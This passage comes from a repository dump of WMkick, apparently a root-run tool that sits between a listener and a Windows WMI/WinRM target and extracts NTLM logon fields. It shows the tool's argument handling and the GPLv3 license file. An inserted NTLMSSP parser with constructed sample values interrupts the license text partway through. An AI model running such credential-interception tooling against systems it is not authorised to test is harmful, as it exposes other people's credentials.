        IPv4 address that will receive/monitor incoming requests. The default
        value is the IPv4 address translated from the local hostname.
        """,
                        metavar='listen-host')
    parser.add_argument('-p', "--protocol",
                        action='append',
                        choices=['all', 'any', 'wmi', 'wsman-http', 'wsman-https'],
                        default=None,
                        dest='protocols',
                        help="""
        Specify a protocol to monitor. This option may be specified multiple
        times. Valid choices include: %(choices)s. The default value is 'all',
        which means monitor WMI (tcp/135), WSMan HTTP (tcp/5985), and WSMan
        HTTPS (tcp/5986) simultaneously. Note that support for WSMan HTTPS
        is not yet implemented.
        """)
    parser.add_argument('target_ip',
                        help="""
        IPv4 address of Windows target where the WMI/WSMAN server is hosted.
        """,
                        metavar='target-ip')
    parser.add_argument('-v', '--version',
                        action='version',
                        help="""
        Show version number and exit.
        """,
                        version=get_release_string_pep440())
    args = parser.parse_args()

    logger = setup_logging(log_levels.get(args.log_level))

    print(BANNER)
    print(' Version: {}'.format(get_release_string_pep440()))
    print(" Press ctrl+c to kill this script.\n")

    if args.listen_host is None:
        try:
            listen_ip = gethostbyname(getfqdn())
        except gaierror:
            logger.error("Could not determine primary IPv4 address. "
                         "Please specify one with '--listen-host'.")
            exit(2)
    else:
        listen_ip = args.listen_host

    target_ip = args.target_ip
    for candidate in [listen_ip, target_ip]:
        try:
            IPv4Address(candidate)
        except AddressValueError:
            logger.error("IPv4 address argument \"%s\" is not valid. Please specify a valid one.", candidate)
            exit(2)

    if geteuid() != 0:
        logger.error("This program must run with root privileges.")
        exit(2)

    signal(SIGINT, catch_sigint)

    if args.protocols is None:
        args.protocols = ['all']
    protocols = sorted(set(args.protocols))
    if 'any' in protocols or 'all' in protocols:
        protocols = ['wmi', 'wsman-http']

    threads = {}
    for protocol in protocols:
        if protocol == 'wsman-https':
            logger.warning("Protocol \"%s\" not yet implemented. Skipping...", protocol)
            continue
        create_thread_pair(threads, listen_ip, target_ip, protocol)

    for name in sorted(threads.keys()):
        threads[name].start()

    for name in sorted(threads.keys()):
        threads[name].join()

    exit(0)

if __name__ == '__main__':
    main()

--------------------------------------------------------------------------------
/README.LICENSE:
--------------------------------------------------------------------------------
1 | 
2 | Table of Contents
3 | 
4 | Section 1 .................... Overview
5 | Section 2 .................... GNU General Public License Version 3
6 | 
7 | 1 Overview
8 | 
9 | This document contains License information for The WMkick Project
10 | ("Project"), which was established by Houston Hunt in 2020.
11 | Unless specifically excluded, all files in the Project fall
12 | under the terms and conditions of the GNU General Public License
13 | Version 3 or later. Excluded files or components, if any, that
14 | fall under other licenses are detailed below as well.
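The search_ntlm method in wmkick.py above walks an NTLMSSP AUTHENTICATE message by fixed offsets to pull out domain, user name and NT response. As an added example that is not part of WMkick, the parser below does the same field walk with bounds checks and reports the two facts a monitoring sensor wants from an NTLM logon seen on the WMI or WinRM port: whether the client fell back to NTLMv1, and whether signing and sealing were negotiated. Field offsets and flag bits follow MS-NLMP; constructed_authenticate_message() and its CORP/alice/WS01 values are a constructed fixture.

```python
"""Bounds-checked NTLMSSP message inventory for a WinRM/WMI monitoring sensor.
Added example, not part of WMkick; offsets follow MS-NLMP section 2.2.1."""
from base64 import b64decode, b64encode
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"

# Subset of NegotiateFlags (MS-NLMP 2.2.2.5). Without SIGN and SEAL the
# authenticated session carries no integrity or confidentiality protection.
NEGOTIATE_FLAGS = {
    0x00000001: "UNICODE",
    0x00000010: "SIGN",
    0x00000020: "SEAL",
    0x00000200: "NTLM",
    0x00008000: "ALWAYS_SIGN",
    0x00080000: "EXTENDED_SESSIONSECURITY",
    0x40000000: "KEY_EXCH",
}


def _payload(buf, offset):
    """Resolve one Len/MaxLen/BufferOffset field triple to its payload bytes."""
    length, _max_len, buf_offset = struct.unpack_from("<HHI", buf, offset)
    if buf_offset + length > len(buf):
        raise ValueError("field at offset %d points outside the message" % offset)
    return buf[buf_offset:buf_offset + length]


def parse_ntlmssp(buf):
    """Describe an NTLMSSP message as a dict, or raise ValueError.

    NEGOTIATE (1) and CHALLENGE (2) yield type and flags; AUTHENTICATE (3)
    adds domain, user, workstation and the NT response length, which is
    exactly 24 bytes for NTLMv1 and longer for NTLMv2.
    """
    if len(buf) < 16 or buf[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    msg_type = struct.unpack_from("<I", buf, 8)[0]
    info = {"type": msg_type}
    if msg_type == 1:                          # flags directly follow the header
        flags = struct.unpack_from("<I", buf, 12)[0]
    elif msg_type == 2 and len(buf) >= 32:     # TargetName fields, flags, challenge
        flags = struct.unpack_from("<I", buf, 20)[0]
        info["server_challenge"] = buf[24:32].hex()
    elif msg_type == 3 and len(buf) >= 64:     # six field triples, then flags
        nt_response = _payload(buf, 20)
        info["domain"] = _payload(buf, 28).decode("utf-16-le")
        info["user"] = _payload(buf, 36).decode("utf-16-le")
        info["workstation"] = _payload(buf, 44).decode("utf-16-le")
        info["nt_response_len"] = len(nt_response)
        info["ntlm_version"] = "NTLMv1" if len(nt_response) == 24 else "NTLMv2"
        flags = struct.unpack_from("<I", buf, 60)[0]
    else:
        raise ValueError("unknown or truncated NTLMSSP message type %d" % msg_type)
    info["flags"] = sorted(name for bit, name in NEGOTIATE_FLAGS.items() if flags & bit)
    info["signed_and_sealed"] = bool(flags & 0x10) and bool(flags & 0x20)
    return info


def parse_negotiate_header(header_value):
    """Parse the token of an HTTP 'Negotiate <base64>' header value, the form
    in which WinRM over tcp/5985 carries NTLMSSP (what wmkick.py regex-matches)."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme != "Negotiate" or not token:
        raise ValueError("not a Negotiate header")
    return parse_ntlmssp(b64decode(token))


def constructed_authenticate_message(nt_response=b"\x11" * 16 + b"\x22" * 44,
                                     flags=0x40088231):
    """Build a sample AUTHENTICATE message; every value here is constructed."""
    payloads = [b"\x00" * 24, nt_response,        # LM and NT responses
                "CORP".encode("utf-16-le"),        # domain
                "alice".encode("utf-16-le"),       # user
                "WS01".encode("utf-16-le"),        # workstation
                b""]                               # encrypted session key
    header_len = 88   # 12 header + 6 * 8 fields + 4 flags + 8 version + 16 MIC
    header = bytearray(NTLMSSP_SIGNATURE + struct.pack("<I", 3))
    body = bytearray()
    for data in payloads:
        header += struct.pack("<HHI", len(data), len(data), header_len + len(body))
        body += data
    header += struct.pack("<I", flags) + bytes(8) + bytes(16)
    return bytes(header + body)


def demo_winrm_header():
    """Run the sample through the HTTP header path a WinRM sensor would see."""
    token = b64encode(constructed_authenticate_message()).decode("ascii")
    return parse_negotiate_header("Negotiate " + token)


if __name__ == "__main__":
    for key, value in demo_winrm_header().items():
        print("%-18s %s" % (key, value))
```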
15 | 16 | 2 GNU General Public License Version 3 17 | 18 | Copyright (C) 2007 Free Software Foundation, 19 | Inc. Everyone is permitted to copy and 20 | distribute verbatim copies of this license document, but changing 21 | it is not allowed. 22 | 23 | Preamble 24 | 25 | The GNU General Public License is a free, copyleft license for 26 | software and other kinds of works. 27 | 28 | The licenses for most software and other practical works are 29 | designed to take away your freedom to share and change the works. 30 | By contrast, the GNU General Public License is intended to 31 | guarantee your freedom to share and change all versions of a 32 | program--to make sure it remains free software for all its users. 33 | We, the Free Software Foundation, use the GNU General Public 34 | License for most of our software; it applies also to any other 35 | work released this way by its authors. You can apply it to your 36 | programs, too. 37 | 38 | When we speak of free software, we are referring to freedom, 39 | not price. Our General Public Licenses are designed to make sure 40 | that you have the freedom to distribute copies of free software 41 | (and charge for them if you wish), that you receive source code 42 | or can get it if you want it, that you can change the software 43 | or use pieces of it in new free programs, and that you know you 44 | can do these things. 45 | 46 | To protect your rights, we need to prevent others from denying you 47 | these rights or asking you to surrender the rights. Therefore, 48 | you have certain responsibilities if you distribute copies of 49 | the software, or if you modify it: responsibilities to respect 50 | the freedom of others. 51 | 52 | For example, if you distribute copies of such a program, whether 53 | gratis or for a fee, you must pass on to the recipients the same 54 | freedoms that you received. You must make sure that they, too, 55 | receive or can get the source code. 
And you must show them these 56 | terms so they know their rights. 57 | 58 | Developers that use the GNU GPL protect your rights with two steps: 59 | (1) assert copyright on the software, and (2) offer you this 60 | License giving you legal permission to copy, distribute and/or 61 | modify it. 62 | 63 | For the developers' and authors' protection, the GPL clearly 64 | explains that there is no warranty for this free software. 65 | For both users' and authors' sake, the GPL requires that modified 66 | versions be marked as changed, so that their problems will not 67 | be attributed erroneously to authors of previous versions. 68 | 69 | Some devices are designed to deny users access to install or 70 | run modified versions of the software inside them, although the 71 | manufacturer can do so. This is fundamentally incompatible with 72 | the aim of protecting users' freedom to change the software. 73 | The systematic pattern of such abuse occurs in the area of 74 | products for individuals to use, which is precisely where it is 75 | most unacceptable. Therefore, we have designed this version of 76 | the GPL to prohibit the practice for those products. If such 77 | problems arise substantially in other domains, we stand ready to 78 | extend this provision to those domains in future versions of the 79 | GPL, as needed to protect the freedom of users. 80 | 81 | Finally, every program is threatened constantly by software 82 | patents. States should not allow patents to restrict development 83 | and use of software on general-purpose computers, but in those that 84 | do, we wish to avoid the special danger that patents applied to a 85 | free program could make it effectively proprietary. To prevent 86 | this, the GPL assures that patents cannot be used to render the 87 | program non-free. 88 | 89 | The precise terms and conditions for copying, distribution and 90 | modification follow. 91 | 92 | TERMS AND CONDITIONS 93 | 94 | 0. Definitions. 
95 | 96 | "This License" refers to version 3 of the GNU General Public 97 | License. 98 | 99 | "Copyright" also means copyright-like laws that apply to other 100 | kinds of works, such as semiconductor masks. 101 | 102 | "The Program" refers to any copyrightable work licensed under 103 | this License. Each licensee is addressed as "you". "Licensees" 104 | and "recipients" may be individuals or organizations. 105 | 106 | To "modify" a work means to copy from or adapt all or part of the 107 | work in a fashion requiring copyright permission, other than the 108 | making of an exact copy. The resulting work is called a "modified 109 | version" of the earlier work or a work "based on" the earlier work. 110 | 111 | A "covered work" means either the unmodified Program or a work 112 | based on the Program. 113 | 114 | To "propagate" a work means to do anything with it that, without 115 | permission, would make you directly or secondarily liable for 116 | infringement under applicable copyright law, except executing it 117 | on a computer or modifying a private copy. Propagation includes 118 | copying, distribution (with or without modification), making 119 | available to the public, and in some countries other activities 120 | as well. 121 | 122 | To "convey" a work means any kind of propagation that enables 123 | other parties to make or receive copies. Mere interaction with 124 | a user through a computer network, with no transfer of a copy, 125 | is not conveying. 126 | 127 | An interactive user interface displays "Appropriate Legal Notices" 128 | to the extent that it includes a convenient and prominently visible 129 | feature that (1) displays an appropriate copyright notice, and 130 | (2) tells the user that there is no warranty for the work (except 131 | to the extent that warranties are provided), that licensees may 132 | convey the work under this License, and how to view a copy of 133 | this License. 
If the interface presents a list of user commands 134 | or options, such as a menu, a prominent item in the list meets 135 | this criterion. 136 | 137 | 1. Source Code. 138 | 139 | The "source code" for a work means the preferred form of the 140 | work for making modifications to it. "Object code" means any 141 | non-source form of a work. 142 | 143 | A "Standard Interface" means an interface that either is an 144 | official standard defined by a recognized standards body, or, 145 | in the case of interfaces specified for a particular programming 146 | language, one that is widely used among developers working in 147 | that language. 148 | 149 | The "System Libraries" of an executable work include anything, 150 | other than the work as a whole, that (a) is included in the normal 151 | form of packaging a Major Component, but which is not part of that 152 | Major Component, and (b) serves only to enable use of the work 153 | with that Major Component, or to implement a Standard Interface 154 | for which an implementation is available to the public in source 155 | code form. A "Major Component", in this context, means a major 156 | essential component (kernel, window system, and so on) of the 157 | specific operating system (if any) on which the executable work 158 | runs, or a compiler used to produce the work, or an object code 159 | interpreter used to run it. 160 | 161 | The "Corresponding Source" for a work in object code form means 162 | all the source code needed to generate, install, and (for an 163 | executable work) run the object code and to modify the work, 164 | including scripts to control those activities. However, it does 165 | not include the work's System Libraries, or general-purpose tools 166 | or generally available free programs which are used unmodified in 167 | performing those activities but which are not part of the work. 
168 | For example, Corresponding Source includes interface definition 169 | files associated with source files for the work, and the source 170 | code for shared libraries and dynamically linked subprograms that 171 | the work is specifically designed to require, such as by intimate 172 | data communication or control flow between those subprograms and 173 | other parts of the work. 174 | 175 | The Corresponding Source need not include anything that users can 176 | regenerate automatically from other parts of the Corresponding 177 | Source. 178 | 179 | The Corresponding Source for a work in source code form is that 180 | same work. 181 | 182 | 2. Basic Permissions. 183 | 184 | All rights granted under this License are granted for the term 185 | of copyright on the Program, and are irrevocable provided the 186 | stated conditions are met. This License explicitly affirms your 187 | unlimited permission to run the unmodified Program. The output 188 | from running a covered work is covered by this License only 189 | if the output, given its content, constitutes a covered work. 190 | This License acknowledges your rights of fair use or other 191 | equivalent, as provided by copyright law. 192 | 193 | You may make, run and propagate covered works that you do not 194 | convey, without conditions so long as your license otherwise 195 | remains in force. You may convey covered works to others for the 196 | sole purpose of having them make modifications exclusively for 197 | you, or provide you with facilities for running those works, 198 | provided that you comply with the terms of this License in 199 | conveying all material for which you do not control copyright. 200 | Those thus making or running the covered works for you must do so 201 | exclusively on your behalf, under your direction and control, 202 | on terms that prohibit them from making any copies of your 203 | copyrighted material outside their relationship with you. 
204 | 205 | Conveying under any other circumstances is permitted solely 206 | under the conditions stated below. Sublicensing is not allowed; 207 | section 10 makes it unnecessary. 208 | 209 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 210 | 211 | No covered work shall be deemed part of an effective technological 212 | measure under any applicable law fulfilling obligations under 213 | article 11 of the WIPO copyright treaty adopted on 20 December 214 | 1996, or similar laws prohibiting or restricting circumvention 215 | of such measures. 216 | 217 | When you convey a covered work, you waive any legal power to 218 | forbid circumvention of technological measures to the extent such 219 | circumvention is effected by exercising rights under this License 220 | with respect to the covered work, and you disclaim any intention 221 | to limit operation or modification of the work as a means of 222 | enforcing, against the work's users, your or third parties' 223 | legal rights to forbid circumvention of technological measures. 224 | 225 | 4. Conveying Verbatim Copies. 226 | 227 | You may convey verbatim copies of the Program's source code as 228 | you receive it, in any medium, provided that you conspicuously 229 | and appropriately publish on each copy an appropriate copyright 230 | notice; keep intact all notices stating that this License and any 231 | non-permissive terms added in accord with section 7 apply to the 232 | code; keep intact all notices of the absence of any warranty; and 233 | give all recipients a copy of this License along with the Program. 234 | 235 | You may charge any price or no price for each copy that you convey, 236 | and you may offer support or warranty protection for a fee. 237 | 238 | 5. Conveying Modified Source Versions. 
239 | 240 | You may convey a work based on the Program, or the modifications 241 | to produce it from the Program, in the form of source code under 242 | the terms of section 4, provided that you also meet all of these 243 | conditions: 244 | 245 | a) The work must carry prominent notices stating that you 246 | modified it, and giving a relevant date. 247 | 248 | b) The work must carry prominent notices stating that it is 249 | released under this License and any conditions added under 250 | section 7. This requirement modifies the requirement in section 251 | 4 to "keep intact all notices". 252 | 253 | c) You must license the entire work, as a whole, under 254 | this License to anyone who comes into possession of a copy. 255 | This License will therefore apply, along with any applicable 256 | section 7 additional terms, to the whole of the work, and all 257 | its parts, regardless of how they are packaged. This License 258 | gives no permission to license the work in any other way, but 259 | it does not invalidate such permission if you have separately 260 | received it. 261 | 262 | d) If the work has interactive user interfaces, each must 263 | display Appropriate Legal Notices; however, if the Program has 264 | interactive interfaces that do not display Appropriate Legal 265 | Notices, your work need not make them do so. 266 | 267 | A compilation of a covered work with other separate and independent 268 | works, which are not by their nature extensions of the covered 269 | work, and which are not combined with it such as to form a larger 270 | program, in or on a volume of a storage or distribution medium, 271 | is called an "aggregate" if the compilation and its resulting 272 | copyright are not used to limit the access or legal rights of 273 | the compilation's users beyond what the individual works permit. 274 | Inclusion of a covered work in an aggregate does not cause this 275 | License to apply to the other parts of the aggregate. 276 | 277 | 6. 
Conveying Non-Source Forms. 278 | 279 | You may convey a covered work in object code form under the 280 | terms of sections 4 and 5, provided that you also convey the 281 | machine-readable Corresponding Source under the terms of this 282 | License, in one of these ways: 283 | 284 | a) Convey the object code in, or embodied in, a physical product 285 | (including a physical distribution medium), accompanied by 286 | the Corresponding Source fixed on a durable physical medium 287 | customarily used for software interchange. 288 | 289 | b) Convey the object code in, or embodied in, a physical product 290 | (including a physical distribution medium), accompanied by 291 | a written offer, valid for at least three years and valid 292 | for as long as you offer spare parts or customer support for 293 | that product model, to give anyone who possesses the object 294 | code either (1) a copy of the Corresponding Source for all 295 | the software in the product that is covered by this License, 296 | on a durable physical medium customarily used for software 297 | interchange, for a price no more than your reasonable cost of 298 | physically performing this conveying of source, or (2) access to 299 | copy the Corresponding Source from a network server at no charge. 300 | 301 | c) Convey individual copies of the object code with a copy of 302 | the written offer to provide the Corresponding Source. This 303 | alternative is allowed only occasionally and noncommercially, 304 | and only if you received the object code with such an offer, 305 | in accord with subsection 6b. 306 | 307 | d) Convey the object code by offering access from a designated 308 | place (gratis or for a charge), and offer equivalent access 309 | to the Corresponding Source in the same way through the same 310 | place at no further charge. You need not require recipients 311 | to copy the Corresponding Source along with the object code. 
312 | If the place to copy the object code is a network server, the 313 | Corresponding Source may be on a different server (operated 314 | by you or a third party) that supports equivalent copying 315 | facilities, provided you maintain clear directions next to 316 | the object code saying where to find the Corresponding Source. 317 | Regardless of what server hosts the Corresponding Source, you 318 | remain obligated to ensure that it is available for as long as 319 | needed to satisfy these requirements. 320 | 321 | e) Convey the object code using peer-to-peer transmission, 322 | provided you inform other peers where the object code and 323 | Corresponding Source of the work are being offered to the 324 | general public at no charge under subsection 6d. 325 | 326 | A separable portion of the object code, whose source code is 327 | excluded from the Corresponding Source as a System Library, 328 | need not be included in conveying the object code work. 329 | 330 | A "User Product" is either (1) a "consumer product", which means 331 | any tangible personal property which is normally used for personal, 332 | family, or household purposes, or (2) anything designed or sold for 333 | incorporation into a dwelling. In determining whether a product 334 | is a consumer product, doubtful cases shall be resolved in favor of 335 | coverage. For a particular product received by a particular user, 336 | "normally used" refers to a typical or common use of that class 337 | of product, regardless of the status of the particular user or of 338 | the way in which the particular user actually uses, or expects or 339 | is expected to use, the product. A product is a consumer product 340 | regardless of whether the product has substantial commercial, 341 | industrial or non-consumer uses, unless such uses represent the 342 | only significant mode of use of the product. 
343 | 344 | "Installation Information" for a User Product means any methods, 345 | procedures, authorization keys, or other information required 346 | to install and execute modified versions of a covered work in 347 | that User Product from a modified version of its Corresponding 348 | Source. The information must suffice to ensure that the continued 349 | functioning of the modified object code is in no case prevented 350 | or interfered with solely because modification has been made. 351 | 352 | If you convey an object code work under this section in, or with, 353 | or specifically for use in, a User Product, and the conveying 354 | occurs as part of a transaction in which the right of possession 355 | and use of the User Product is transferred to the recipient in 356 | perpetuity or for a fixed term (regardless of how the transaction 357 | is characterized), the Corresponding Source conveyed under this 358 | section must be accompanied by the Installation Information. 359 | But this requirement does not apply if neither you nor any third 360 | party retains the ability to install modified object code on the 361 | User Product (for example, the work has been installed in ROM). 362 | 363 | The requirement to provide Installation Information does not 364 | include a requirement to continue to provide support service, 365 | warranty, or updates for a work that has been modified or installed 366 | by the recipient, or for the User Product in which it has been 367 | modified or installed. Access to a network may be denied when 368 | the modification itself materially and adversely affects the 369 | operation of the network or violates the rules and protocols for 370 | communication across the network. 
371 | 372 | Corresponding Source conveyed, and Installation Information 373 | provided, in accord with this section must be in a format that is 374 | publicly documented (and with an implementation available to the 375 | public in source code form), and must require no special password 376 | or key for unpacking, reading or copying. 377 | 378 | 7. Additional Terms. 379 | 380 | "Additional permissions" are terms that supplement the terms 381 | of this License by making exceptions from one or more of its 382 | conditions. Additional permissions that are applicable to the 383 | entire Program shall be treated as though they were included in 384 | this License, to the extent that they are valid under applicable 385 | law. If additional permissions apply only to part of the Program, 386 | that part may be used separately under those permissions, but the 387 | entire Program remains governed by this License without regard 388 | to the additional permissions. 389 | 390 | When you convey a copy of a covered work, you may at your option 391 | remove any additional permissions from that copy, or from any part 392 | of it. (Additional permissions may be written to require their own 393 | removal in certain cases when you modify the work.) You may place 394 | additional permissions on material, added by you to a covered work, 395 | for which you have or can give appropriate copyright permission. 
Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms:

a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or

b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or

c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or

d) Limiting the use for publicity purposes of names of licensors or authors of the material; or

e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or

f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors.

All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying.

If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms.

Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way.

8. Termination.

You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11).

However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation.

Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice.

Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10.

9. Acceptance Not Required for Having Copies.

You are not required to accept this License in order to receive or run a copy of the Program. Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so.

10. Automatic Licensing of Downstream Recipients.

Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License.

An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts.

You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it.

11. Patents.

A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. The work thus licensed is called the contributor's "contributor version".

A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License.

Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version.

In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party.

If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. "Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid.

If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it.

A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007.

Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law.

12. No Surrender of Others' Freedom.

If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program.

13. Use with the GNU Affero General Public License.

Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such.

14. Revised Versions of this License.

The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns.

Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation.

If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program.

Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version.

15. Disclaimer of Warranty.

THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.

16. Limitation of Liability.

IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

17. Interpretation of Sections 15 and 16.

If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee.

--------------------------------------------------------------------------------